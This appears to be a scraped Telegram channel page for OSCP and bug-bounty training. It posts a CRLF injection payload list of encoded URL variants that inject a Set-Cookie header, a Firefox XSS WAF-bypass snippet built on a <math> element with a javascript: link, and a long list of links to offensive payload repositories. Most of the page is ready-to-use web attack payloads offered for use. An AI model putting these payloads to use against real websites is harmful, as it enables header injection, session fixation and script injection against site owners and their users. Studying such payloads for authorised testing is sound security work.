πŸ”₯OSCP TrainingπŸ”₯πŸ›‘βš”οΈπŸ‘¨πŸ»β€πŸ’»
7.58K subscribers
75 photos
1 video
16 files
57 links
Offensive Security Certified Professional
@CEH_training
@WebHacking
@pfsense
@WifiHacking
πŸ”°For safer days
Download Telegram
CRLF Payload List

πŸ”Ή /%%0a0aSet-Cookie:crlf
πŸ”Ή /%0aSet-Cookie:crlf
πŸ”Ή /%0d%0aSet-Cookie:crlf
πŸ”Ή /%0dSet-Cookie:crlf
πŸ”Ή /%23%0aSet-Cookie:crlf
πŸ”Ή /%23%0d%0aSet-Cookie:crlf
πŸ”Ή /%23%0dSet-Cookie:crlf
πŸ”Ή /%25%30%61Set-Cookie:crlf
πŸ”Ή /%25%30aSet-Cookie:crlf
πŸ”Ή /%250aSet-Cookie:crlf
πŸ”Ή /%25250aSet-Cookie:crlf
πŸ”Ή /%2e%2e%2f%0d%0aSet-Cookie:crlf
πŸ”Ή /%2f%2e%2e%0d%0aSet-Cookie:crlf
πŸ”Ή /%2F..%0d%0aSet-Cookie:crlf
πŸ”Ή /%3f%0d%0aSet-Cookie:crlf
πŸ”Ή /%3f%0dSet-Cookie:crlf
πŸ”Ή /%u000aSet-Cookie:crlf
πŸ”Ή /%E5%98%8D%E5%98%8ASet-Cookie:crlf
Bug Bounty Reminder

Don't forget about the <math> element for XSS WAF bypass on Firefox browser.

<math>
<xss href="javascript:alert(31337)">
Click Me
</xss>
</math>

The <math> can make any HTML element clickable within it.
Bug bounty Cheatsheet:

For more like this, join us at:
t.me/OSCP_training

XSS
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xss.md
https://github.com/ismailtasdelen/xss-payload-list

SQLi
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/sqli.md

SSRF
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/ssrf.md
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery

CRLF
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/crlf.md
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CRLF%20Injection

CSV-Injection
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/csv-injection.md
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CSV%20Injection

Command Injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection

Directory Traversal
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Directory%20Traversal

LFI
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/lfi.md
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion

XXE
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xxe.md

Open-Redirect
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/open-redirect.md

RCE
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/rce.md

Crypto
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/crypto.md

Template Injection
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/template-injection.md
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection

XSLT
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/xslt.md

Content Injection
https://github.com/EdOverflow/bugbounty-cheatsheet/blob/master/cheatsheets/content-injection.md

LDAP Injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LDAP%20Injection

NoSQL Injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection

CSRF Injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/CSRF%20Injection

GraphQL Injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/GraphQL%20Injection

IDOR
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Insecure%20Direct%20Object%20References

ISCM
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Insecure%20Source%20Code%20Management

LaTex Injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/LaTeX%20Injection

OAuth
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/OAuth

XPATH Injection
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XPATH%20Injection

Bypass Upload Tricky
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files